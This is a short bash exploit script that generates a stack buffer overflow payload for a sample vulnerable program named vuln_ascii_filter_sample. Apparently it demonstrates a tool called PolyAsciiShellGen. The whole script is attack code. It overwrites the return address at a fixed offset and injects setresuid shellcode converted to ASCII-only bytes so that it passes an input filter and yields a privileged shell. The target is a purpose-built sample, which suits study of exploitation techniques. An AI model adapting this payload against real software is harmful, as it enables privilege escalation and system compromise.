################################################################################
#
# Date: May 18 2018
# Author: Vincent Dary
# File: exploit_ascii_filter_sample.sh
# Licence: GPLv3
# Description: Generate the payload to inject in the standard input of
#              vuln_ascii_filter_sample to exploit it.
#
# Using exemple:
#   $ (./exploit_ascii_filter_sample.sh; cat) | ./vuln_ascii_filter_sample
################################################################################

#!/bin/bash

set -e

ret_offset="24"
ret_addresse="\x24\xdc\xff\xff"
esp_offset="-316"
nop_factor="0"

input_book_ref=$(perl -e "print 'A'x'$ret_offset'.'$ret_addresse'.'\n'")

setresuid_shellcode=$(hexdump -v -e '"\\" "x" 1/1 "%02X"' setresuid_shellcode)

ascii_shellcode=$(./PolyAsciiShellGen $esp_offset $nop_factor $setresuid_shellcode)

echo -e "$input_book_ref$ascii_shellcode"